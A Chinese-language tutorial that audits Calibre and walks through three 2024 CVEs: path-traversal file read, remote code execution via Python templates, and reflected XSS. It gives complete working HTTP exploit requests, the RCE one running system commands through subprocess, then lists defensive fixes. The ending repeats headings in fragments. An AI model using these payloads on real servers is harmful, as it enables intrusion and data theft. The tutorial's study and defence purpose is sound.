Calibre代码审计与漏洞分析教学文档<\/h1>

一、环境搭建<\/h2>

1.1 漏洞影响版本<\/h3>

Calibre <= 7.14.0<\/li> <\/ul>

1.2 项目获取与构建<\/h3>

# 项目地址：calibre<\/span>
<\/span><\/span>Python setup.py build_dep windows  # 构建依赖项<\/span>
<\/span><\/span>Python setup.py win64 --dont-sign  # 安装<\/span>
<\/span><\/span><\/code><\/pre>1.3 服务启动<\/h3>
安装完成后在操作页面开启服务<\/p>
二、Calibre架构分析<\/h2>
2.1 核心模块机制<\/h3>
Calibre各个模块文件主要通过cdb.py<\/code>调用，其中定义了电子书数据库执行操作所用的一系列API。<\/p>
2.2 动态路由机制<\/h3>

路由器根据HTTP请求路径动态导入辅助模块<\/li>
模块命名格式：cmd_*.py<\/code><\/li>
示例：请求路由\/cdb\/cmd\/export<\/code>时，路由器解析出模块名称cmd_export<\/code><\/li>
发包请求体内容作为参数传入，触发相应操作<\/li>
<\/ul>
2.3 核心代码分析（src\/calibre\/srv\/cdb.py）<\/h3>
关键函数逻辑：<\/p>
def<\/span> module_for_cmd<\/span>(which):
<\/span><\/span>    # 动态加载模块<\/span>
<\/span><\/span>    # 如果模块readonly属性为False，会调用ctx.check_for_write_access(rd)检查写权限<\/span>
<\/span><\/span>    # 模块加载是动态的，which参数未进行路径限制或校验<\/span>
<\/span><\/span><\/code><\/pre>安全绕过机制：<\/p>

如果模块readonly<\/code>属性设置为True，可通过传入该模块名绕过check_for_write_access<\/code>检查<\/li>
通过m.implementation<\/code>方法调用对应模块的implementation方法<\/li>
<\/ul>
三、CVE-2024-6781 任意文件读取漏洞<\/h2>
3.1 漏洞位置<\/h3>

文件：src\/calibre\/db\/cli\/cmd_export.py<\/code><\/li>
<\/ul>
3.2 漏洞分析<\/h3>

权限绕过<\/strong>：readonly<\/code>模块变量为True，绕过check_for_write_access()<\/code>检查<\/li>
危险函数<\/strong>：当action<\/code>为extra_file<\/code>时，调用db.copy_extra_file_to()<\/code>方法<\/li>
路径遍历<\/strong>：relpath<\/code>参数未过滤，直接用于构建相对路径读取文件<\/li>
数据返回<\/strong>：文件内容存储到BytesIO<\/code>变量并返回给用户<\/li>
<\/ol>
3.3 漏洞复现<\/h3>
请求包构造：<\/strong><\/p>
POST \/cdb\/cmd\/export HTTP\/1.1
Host: ip:8080
Content-Type: application\/json

["extra_file", 1, "..\/..\/..\/..\/..\/Users\/\/321.txt", ""]
<\/code><\/pre>
利用要点：<\/strong><\/p>

使用路径遍历字符串..\/..\/..\/..\/<\/code>访问系统任意文件<\/li>
第二个参数为书籍ID（示例中为1）<\/li>
第四个参数为空字符串<\/li>
<\/ul>
四、CVE-2024-6782 远程代码执行漏洞<\/h2>
4.1 漏洞位置<\/h3>

文件：src\/calibre\/db\/cli\/cmd_list.py<\/code><\/li>
<\/ul>
4.2 漏洞分析<\/h3>

权限绕过<\/strong>：readonly<\/code>值为True，绕过权限校验<\/li>
模板参数控制<\/strong>：field == 'template'<\/code>时，用户可控制template参数<\/li>
格式化处理<\/strong>：

初始化字典vals<\/code>存储格式化结果<\/li>
调用safe_format<\/code>方法处理用户提供的template参数<\/li>
<\/ul>
<\/li>
代码执行链<\/strong>：

formatter.safe_format()<\/code> → evaluate()<\/code>函数<\/li>
如果参数以python:<\/code>开头，直接解析执行Python代码<\/li>
无输入过滤和验证机制<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 漏洞复现<\/h3>
请求包构造：<\/strong><\/p>
POST \/cdb\/cmd\/list HTTP\/1.1
Host: ip:8080
Content-Type: application\/json
Content-Length: 303

[
["template"],
"",
"",
"",
1,
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '\/c', 'whoami']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami']).decode()"
]
<\/code><\/pre>
利用要点：<\/strong><\/p>

模板参数必须以python:<\/code>开头<\/li>
使用subprocess<\/code>模块执行系统命令<\/li>
支持跨平台命令执行（Windows cmd.exe和Unix sh）<\/li>
<\/ul>
五、CVE-2024-7008 反射型XSS漏洞<\/h2>
5.1 漏洞位置<\/h3>

文件：src\/calibre\/srv\/legacy.py<\/code><\/li>
<\/ul>
5.2 漏洞分析<\/h3>

路由模式<\/strong>：请求路由为\/browse\/book\/{%}<\/code>形式<\/li>
直接插入<\/strong>：用户输入的rest<\/code>参数直接插入redirect<\/code>变量<\/li>
HTML\/JS拼接<\/strong>：使用lxml函数将变量拼接到HTML和JavaScript代码中<\/li>
缺乏过滤<\/strong>：参数无清理和转义，可直接闭合字符串执行恶意代码<\/li>
<\/ol>
5.3 漏洞复现<\/h3>
Payload构造：<\/strong><\/p>
http:\/\/ip:8080\/browse\/book\/TEST&quot;;window.stop();alert(document.location);%2f%2f
<\/code><\/pre>
利用要点：<\/strong><\/p>

使用双引号闭合原有字符串："<\/code><\/li>
window.stop()<\/code>停止页面加载<\/li>
alert(document.location)<\/code>演示XSS效果<\/li>
URL编码确保正确传输<\/li>
<\/ul>
六、安全防护建议<\/h2>
6.1 输入验证与过滤<\/h3>

对所有用户输入进行严格的路径校验<\/li>
实现输入白名单机制<\/li>
对特殊字符进行转义处理<\/li>
<\/ul>
6.2 权限控制增强<\/h3>

重新评估readonly<\/code>属性的安全含义<\/li>
实现更严格的权限检查机制<\/li>
避免通过属性设置绕过安全控制<\/li>
<\/ul>
6.3 代码执行防护<\/h3>

对动态代码执行进行沙箱隔离<\/li>
限制可执行的Python代码范围<\/li>
实现代码签名验证机制<\/li>
<\/ul>
6.4 输出编码<\/h3>

对所有输出到HTML的内容进行编码<\/li>
实施Content Security Policy策略<\/li>
使用安全的模板引擎<\/li>
<\/ul>
七、总结<\/h2>
本次审计揭示了Calibre软件在多个安全维度存在的严重漏洞，包括：<\/p>

路径遍历<\/strong>导致任意文件读取<\/li>
代码注入<\/strong>导致远程命令执行<\/li>
输入验证缺失<\/strong>导致XSS攻击<\/li>
<\/ol>
这些漏洞的根本原因在于对用户输入缺乏充分的验证和过滤，以及权限控制机制存在设计缺陷。建议开发者在类似项目中引以为戒，建立完善的安全开发生命周期。<\/p>

Calibre代码审计与漏洞分析教学文档<\/h1>

一、环境搭建<\/h2>

1.3 服务启动<\/h3> 安装完成后在操作页面开启服务<\/p>

二、Calibre架构分析<\/h2>

2.1 核心模块机制<\/h3> Calibre各个模块文件主要通过cdb.py<\/code>调用，其中定义了电子书数据库执行操作所用的一系列API。<\/p>

三、CVE-2024-6781 任意文件读取漏洞<\/h2>

四、CVE-2024-6782 远程代码执行漏洞<\/h2>

五、CVE-2024-7008 反射型XSS漏洞<\/h2>

六、安全防护建议<\/h2>

1.3 服务启动<\/h3>
安装完成后在操作页面开启服务<\/p>

2.1 核心模块机制<\/h3>
Calibre各个模块文件主要通过`cdb.py<\/code>调用，其中定义了电子书数据库执行操作所用的一系列API。<\/p>`